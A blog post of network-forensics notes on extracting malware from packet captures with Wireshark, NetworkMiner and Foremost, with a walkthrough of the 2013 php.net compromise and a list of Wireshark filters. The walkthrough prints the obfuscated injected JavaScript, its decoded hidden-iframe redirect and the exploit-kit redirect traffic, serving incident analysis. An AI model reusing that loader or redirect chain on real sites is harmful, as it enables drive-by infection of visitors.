Thursday, 25 May 2017

File Download Analysis using Wireshark

Note: Usually executables in Microsoft systems start from MZ or 4D 5A in HEX.

The MS-DOS MZ executable format is the executable file format used for .EXE files in MS-DOS.
 
The file can be identified by the ASCII string "MZ" (hexadecimal: 4D 5A) at the
beginning of the file (the "magic number")
  
Filename extension                    :  .exe
    Magic number / file_signatures :  MZ or ZM
    Type of format                           : Binary, executable  

This is a list of file signatures, data used to identify or verify the content of a file. Such signatures are also known as magic numbers.
     
                               https://en.wikipedia.org/wiki/Magic_number_(programming)
       
Malware Analysis Using WireShark 1:

    When we are involved in an incident handling and we are in charge of analyzing a traffic capture in a pcap format related to an attack, one of the things we usually need to do is get the files which were downloaded. The reason is that we need to have a copy of the malware or the exploit to analyze it by reversing engineer or similar.
  
We usually detect the original sources where these files were downloaded from just analyzing the pcap file, but they disappear in a short period of time from they were originally hosted. Because of that, we will need to extract them directly from the pcap file.

show you three different ways to achieve this goal using the the pcap hosted in Barracuda related to the www.php.net compromise which can be downloaded here:
       
   
1. Wireshark is the most popular network protocol analyzer. It is capable of extracting all the files which were downloaded and captured.

     If you load the pcap file in you Wireshark and use the command below...

     ---> http contains "in DOS mode"     [seems case sensitive search]
  
you can check that some executables were downloaded. If you can see some text in pcap like "This Program cannot be run in DOS mode" which means some executables downloaded in your machine.
 
2. We are able to download all files which were downloaded like executables, pictures, javascripts, etc... by clicking

     File --> Export Objects --> HTTP and clicking on "Save all".  
 
3. After saving it in a folder (make sure you are not in your official/critical network, as these files contain virus) list it in a command prompt and which shows you the files which are been recovered.
 
     # ls

    use the command below to filter only the executables.

     # file * | grep PE32

  00000238.exe: PE32 executable (GUI) Intel 80386, for MS Windows
   00000426.exe: PE32 executable (GUI) Intel 80386, for MS Windows
   00000698.exe: PE32 executable (GUI) Intel 80386, for MS Windows
   00000979.exe: PE32 executable (GUI) Intel 80386, for MS Windows
   00001561.exe: PE32 executable (console) Intel 80386, for MS Windows

If we upload these files to Virustotal, we check that all of them have been categorized as malicious.

4. Or run #sha256sum or #md5sum against the file and check the hash in VT for more details.
           Investigative Process md5sum Lab: http://www.etree.org/md5com.html
                                               # md5sum filename
    
 MD5 will only take care about the data of the file. Nothing else.

 online hash valuse calculator : will give value of all hashs for the file.
If we change/modify a file content MD5 value also change. If we reverse the change made MD5 valuse also will reverse.
This is with respect to file integrity. No change / Modified 
Confidentiality: Here You do want to change. Plain text to cypher text
 NetworkMinner
----------------------
  NetworkMiner is another Network Forensic Analysis Tool (NFAT) for Windows. Also, it can be installed on Linux using Mono. This tool is a great alternative to Wireshark if you just want to extract the files which were downloaded, look at the sessions, discover the DNS queries or get details about the mails detected from a pcap file.  

 Foremost   
-------------
   Foremost is a well known file carving tool.

    Foremost is a forensic program to recover lost files based on their headers, footers, and internal data structures. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.
Use Foremost to extract files from a pcap file. 
    
Just downloaded we extract all files from the pcap file, we execute the command below to extract all the files.

    # foremost -v -i 5f810408ddbbd6d349b4be4766f41a37.pcap

Output directory: /root/Desktop/pcap/output
Configuration file: /etc/foremost.conf
Processing: 5f810408ddbbd6d349b4be4766f41a37.pcap
|------------------------------------------------------------------
File: 5f810408ddbbd6d349b4be4766f41a37.pcap
Start: Sat Feb 18 18:23:14 2017
Length: 1 MB (1256656 bytes)
Num  Name (bs=512)        Size  File Offset  Comment 

0: 00000093.gif         2 KB        47775    (120 x 67)
1: 00000104.gif         61 B        53438    (11 x 11)
2: 00000201.htm         1 KB       103400   
3: 00000209.htm        209 B       107474   
4: 00000211.htm        11 KB       108304   
5: 00000238.exe        87 KB       122358   10/21/2013 23:12:21
6: 00000426.exe       126 KB       218488   10/21/2013 23:20:44
7: 00000698.exe       132 KB       357688   11/06/2012 19:06:55
8: 00000979.exe       233 KB       501404   10/22/2013 19:15:03
9: 00001561.exe       236 KB       799271   10/21/2013 22:15:46
10: 00000103.png        178 B        52913    (197 x 20)
11: 00000103_1.png        207 B        53161    (197 x 20)
*|
Finish: Sat Feb 18 18:23:14 2017

12 FILES EXTRACTED
gif:= 2
htm:= 3
exe:= 5
png:= 2
------------------------------------------------------------------

Foremost finished at Sat Feb 18 18:23:14 2017

# ls
5f810408ddbbd6d349b4be4766f41a37.pcap  output

root@kali:~/Desktop/pcap# cd output/

root@kali:~/Desktop/pcap/output# ls
audit.txt  exe  gif  htm  png

root@kali:~/Desktop/pcap/output# cd exe/

root@kali:~/Desktop/pcap/output/exe# 

root@kali:~/Desktop/pcap/output/exe# ls
00000238.exe  00000426.exe  00000698.exe  00000979.exe  00001561.exe

root@kali:~/Desktop/pcap/output/exe# 

oot@kali:~/Desktop/pcap/output/exe# sha256sum 0*
2bcc5f03e1d63c5fab4aa362f6aecd43def44cc3c246effc13accb7b27b1bd45  00000238.exe
647e4bbed78346eccc7c2d12826da5f17414110e52fb200ee55f2b8c5df533f1  00000426.exe
38bc430e9d8656ee227e48236157e716b1d5038e83e53937cb534a5920d28c28  00000698.exe
15964d7dd9644c8ce29fbcc4585b85394af10545ac2a2ba2315befe8e93b2a4d  00000979.exe
32159b706d1addf63cdb1978291fc7222558d8fb7a3044775e242fba9661838d  00001561.exe

root@kali:~/Desktop/pcap/output/exe# md5sum 0*
45321f9c1e2ac0a99c0724dde764ba17  00000238.exe
03305ab862fc83383f8f9482210682cd  00000426.exe
528294f14b868b8e13cc6fd08fa3598a  00000698.exe
f701064c0e436dd2408a580e1711f7fd  00000979.exe
a77f03860762b1bbbdf533a529e98daf  00001561.exe


Note: 
    [ But the checksum is different than we got with Wireshark or NetworkMinner. 
      It seems like Foremost hasn't work well with the pcap file... For this reason I don't usually use it with a pcap file.]

Search for a selection of file types (-t doc,jpg,pdf,xls) in the given image file (-i image.dd):

root@kali:~# foremost -t doc,jpg,pdf,xls -i image.dd 
Processing: image.dd
|*|


 Xplico
*********


 Malware Analysis Using WireShark 2: PHP.net Compromise
        
  http.request.method == "GET" and http.response.code == 200
If we upload the PCAP file to VirusTotal we can see the URLs which were visited by the infected computer in the "File details" section. Or using wireshark filter the traffic. Using GET & success 200 code or using the website name itself.
  http.request.method == "GET" and http.host contains "php.net"

  http.host=="exact.DomainName.here"
  
  http.host contains "partial.DomainName.here"
We can see that the www.php.net website was visited. If we open the PCAP file with Wireshark and we look at the "Follow TCP Stream" of the petition www.php.net/userprefs.js  we can see the script with the obfuscated code in the picture below. (This malicious code has been removed from the website)
+Sf\x7f5cSe{TdM\x08(tpIf~rId^xg?L~rhj*\x09_\x08g{\\lO\x00\"~rHb^xa8VZo<ETXc\x16VXi\x1d*\x01]\x0a#\x00iYVFO\"\x00Vri=|zC>|rM>f\\ZhN\\zc2*#
\x7f#W2j\x09YvNg\"\x0aTPa\x1aVRd3\\zn2nVri?|zCicVPk\x10\\Z8\x1a\\z87,(\x0bW\"mGA+\x1boLyM(L[tNm(\x20\\zjo~rn;TXg\x11W|rIk\x0a)\x7f\"OOc[TLM\
x0a(Vpi\x16^Xn\x14VPnKL~rHb^xg8^~rolTX2\x15(\x09W\x013UdGfOtg\x20QbH\x19nodmTg\x00\\dM\x13lMlG~O\x20Wd9u#\x0a}cflOu\x091",b2=["\x73\x70\x6c\
x69\x74",Ud=(0x84^0xc3)*(0xf9-0xf3)/2,"\x6c\x65\x6e\x67\x74\x68","\x68\x61\x73\x4f\x77\x6e\x50\x72\x6f\x70\x65\x72\x74\x79"],VV="\xc3\x9f\xae
\x15\xf9\x928\xb4{\xcbV\x00D?GD|\x9f{:[\xa8\xd0\x9a",NQ=LUI["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,VV[b2[2]]);VDG=function(Av){var sCV,j9,
nB=j9="",GC=0;Av=Av[b2[0]](nB);for(sCV in Av){if(Av[b2[3]](sCV)){j9+=SjB(Av[sCV],NQ[b2[0]](nB)[GC%=NQ[b2[2]]]);GC++;}}return(j9);};NQ=VDG(VV);
Anv[VDG("oVkD")](VDG(LUI[VDG("yUh[|ZiLm")](VV[VDG("fEdO|@")])))})(window,SjB=function(uC,lp,XN,OA){uC=uC[XN="\x63"+(OA="\x68\x61\x72\x43\x6f\
x64\x65")+"\x41\x74"](0);return(String["\x66\x72\x6f\x6d\x43"+OA](uC&Ud|((uC&(~Ud&0xff))^(lp[XN](0)&(~Ud&0xff)))))});GET /www.php.net/images

The guys from Alienvault have decoded the script. Here they have published the picture below with the code de-ofuscated. We can see an IFRAME with a 10x10px size which redirects the connection to another website was able in the php.net site.

  <DIV style="height: 10px; width: 10px; overflow: hidden; position: absolute; left:
  <IFRAME src=http://url.whichusb.co.uk/stat.htm></IFRAME></DIV>
  
If we research with Wireshark the link contained in the IFRAME in the picture above, we can see how the code is trying to get the information about the computer. It wants to know if the browser has the Java or AdobeReader plugins installed and enabled.  

The next URL where the computer is redirected is /PluginDetect_All.js. In the payload of this connection we can see that the hackers are using PluginDetect in order to detect the browser plugins.

 http.request.method == "GET"
 check the follow ----> TCP stream option agains the file
                      PluginDetect_All.js using wireshark. You can see the below scripts in the file
 
 <script type="text/javascript" src="PluginDetect_All.js"></script>
var os=PluginDetect.OS
var javaversion=PluginDetect.getVersion('Java','./getjavainfo.jar');
var adobe=PluginDetect.getVersion("AdobeReader");
</html>GET /PluginDetect_All.js HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate

/* PluginDetect v0.7.5 by Eric Gerds www.pinlady.net/PluginDetect [ onWindowLoaded isMinVersion getVersion onDetectionDone getInfo Java(OTF & NOTF) 
 QT DevalVR Shockwave Flash WMP Silverlight VLC AdobeReader PDFreader(OTF & NOTF) RealPlayer ] *
{b=d.formatNum(d.getNum(t.enabledPlugin.description))}if(d.OS==1&&b){var f=b.split(d.splitNumRegx);s=true;if(j.compare(f,[6,0,12,200])<0)
{s=false}else{if(j.compare(f,[6,0,12,1739])<=0&&j.compare(f,[6,0,12,857])>=0){s=false}}}if(s===false){q=0}if(d.OS<=2)
{if(d.isGecko&&d.compareNums(d.verGecko,d.formatNum("1,8"))<0){q=0}if(d.isChrome){q=0}if(d.isOpera&&d.verOpera<10){q=0}}else{q=0}if(q)
{t=d.insertHTML("object",["type",j.mimeType[0]],["src","","autostart","false","imagestatus","false","controls","stopbutton"],"",j);
t=d.getDOMobj(t);try{k=d.getNum(t.GetVersionInfo())}catch(r){}d.setStyle(t,["display","none"])}if(!k&&b&&s===false){t=j.convertNum(b,j.q3,j.q1);
k=t?t:b}}}else{k=j.version}j.installed=c&&g&&k?1:(c&&g?0:(c?-0.2:-1))}else{t=null;for(i=0;i<j.progID.length;i++){t=d.getAXO(j.progID[i]);if(t)

In the PCAP file we can see how the computer send a POST connection telling to the website if it has the Java or AdobeReader plugin enabled. Then, the web browser is redirected again.

{try{k=d.getNum(t.GetVersionInfo());break}catch(r){}}}j.installed=k?1:-1}if(!j.version){j.version=d.formatNum(k)}j.INSTALLED[a]=j.installed}},zz:0};
PluginDetect.initScript();POST /stat.htm HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 14
Connection: Keep-Alive
Cache-Control: no-cache

id=800%7C1%7C1HTTP/1.1 302 Found
Server: nginx/1.0.15
Date: Tue, 22 Oct 2013 21:23:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Expires: Tue, 22 Oct 2013 21:23:14 GMT
Last-Modified: Tue, 22 Oct 2013 21:23:14 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Location: http://aes.whichdigitalphoto.co.uk/nid?1   --- redirecting
Content-Length: 0

The next URL which was visited is marked in bold in VirusTotal. This means that the files that were downloaded are categorized as malware by some antivirus engines. Now, the computer is infected. The first network connection that the malware does is to visit a website where there are a javascript that detects the computer location.

  GET /app/geoip.js HTTP/1.0
  Host: j.maxmind.com
  Connection: close

HTTP/1.0 200 OK
Expires: Tue, 22 Oct 2013 19:58:38 GMT
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Content-Length: 512

function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city()         { return 'Campbell'; }
function geoip_region()       { return 'CA'; }
function geoip_region_name()  { return 'California'; }
function geoip_latitude()     { return '37.2803'; }
function geoip_longitude()    { return '-121.9567'; }
function geoip_postal_code()  { return '95008'; }
function geoip_area_code()    { return '408'; }
function geoip_metro_code()   { return '807'; }
Conclusion: 
           If we trust in the PCAP file that Barracuda offers us, we can tell that www.php.net was compromised. The hackers uploaded a javascript to this site  which redirects to another one where there was a web plugin detector. Depends of what browser plugins are enabled in the computer, the website could redirects you to a Java or AdobeReader exploit. Then, after exploiting the vulnerability,  a trojan that seems to be the ZeroAccess trojan is donwloaded and installed. It seems that this trojan is focused in click-fraud.

[
Packet Viewing : Packet List Column header ( Packet heading) Packet List Pane : All packet details Packet Details pane : Frame / Ethernet / Internet Protocol / Transmission control protocol Packet Bytes pane : ASCII / HEX ] Some wireshark filters 1. ip.addr == 10.0.0.1 [Sets a filter for any packet with 10.0.0.1, as either the source or dest] 2. ip.addr == 10.0.0.1 && ip.addr==10.0.0.2 [sets a conversation filter
between the two defined IP addresses]
ip.src ip.dst 3. http or dns [sets a filter to display all http and dns]
To view only DNS traffic, type udp.port == 53 (lower case) in the
Filter box and press Enter.
Select the DNS packet labeled Standard query A
dns and ip.addr==159.25.78.7 dns and ip.dst==159.25.78.7 or dns and ip.src==159.57.78.7 4. tcp.port == 4000
[sets a filter for any TCP packet with 4000 as a source or dest port]

[Filter for specific port] udp.port 5. tcp.flags.reset==1 [displays all TCP resets] 6. http.request [displays all HTTP GET requests] : check for the request
and response
http.response.code == 200/500/404 7. tcp contains traffic [displays all TCP packets that contain the word ‘traffic’.
Excellent when searching on a specific string or user ID]
8. !(arp or icmp or dns) [masks out arp, icmp, dns, or whatever other
protocols may be background noise. Allowing you to focus on the traffic of interest]
How we can exclude some of the noise in the trace file # !(arp or dns or icmp) : This will leave arp,dns,icmp from trace file
and leave the rest. This is called pruning the trace file. 9. udp contains 33:27:58 [sets a filter for the HEX values of 0x33 0x27 0x58 at any offset] 10. tcp.analysis.retransmission [displays all retransmissions in the trace.
Helps when tracking down slow application performance and packet loss]
11. I would first filter on the conversation with the nmap target using the
"ip.addr == 10.0.0.1" filter.
Then you could use the SYN/ACK filter to see the connections that are approved by the target. Try this - tcp.flags.syn == 1 && tcp.flags.ack == 1 Any packet with these two bits set as true in the TCP header will be displayed. This will give a list of the open ports. 12. Extract files from pcaps: http export : You can find this at File > Export > Objects > Http, you will be presented with a list of files found in all the http requests.
The bad thing about this feature is that even with the latest version (1.6.5 at the time of this writing) you still can’t sort by column or apply any filters which makes finding something specific hard. export bytes : To find this you will have to drill down in the packet you want, depending on the protocol. Right click > Export selected bytes The advantage of doing it this way is that you can actually extract files from other protocols other than http (like ftp or smb) and you can use display filters. Network miner : Network miner is a tool for network analysis but with a focus on forensic analysis. It can load a pcap and extract files and other data. Chaosreader : This tool will analyze and extract session information and files and create
an html report you can open in any browser
chaosreader http-data.pcap It will create a lot of files so you may want to launch it inside an empty dir or make a new
one and use the -D option, then you can open index.html
Refer: https://www.sans.org/reading-room/whitepapers/tools/extracting-files-network-packet-captures-36562 12. Filter for protocol dns or http -----> Displays only the dns traffic and http traffic that we have in the trace file 13. Filter which shows any TCP problems in the trace file : packet lose, windows problem etc # tcp.analysis.flags 14. Select any packet in TCP conversation that we interested in looking at and
Right Click----> Follow---->TCP Stream
It will bring up the follow tcp stream content if there any content in tcp packet in that stream. 15. Filter for some text / tab name / executable etc # tcp contains facebook # udp contains facebook : Which shows all my DNS query for facebook 16. Check for SYN attack # tcp.flags.syn == 1 # tcp.flags.reset ==1 17. VOIP # sip && rtp Add and Customize Columns in WireShark 1. Check in the Packet Details pane. Select the host you want to create..

Right click on it ---> Apply as Column
You can see that host/name as a column in that Packet List Pane 2. Customize Columns :

In the following example I will add another column to the Packet List and will customize this column.
Select a packet in the Packet List pane, that contains the TCP protocol. Expand Transmission Control Protocol in the Packet Details pane. Select "Source port: ....". Right-click and select "Apply as Column" to add the column "Source Port" to the Packet List. Next right-click the column "Source Port" in the Packet List column header. Select "Edit Column Details…". Change the Title "Source Port" to "TCP Port". Change the Field name "tcp.srcport" to "tcp.port". As you can see in the following screenshot the TCP source and TCP destination port show up in the same column. 3. Display or Hide Columns :
















************************************





No comments:

Post a Comment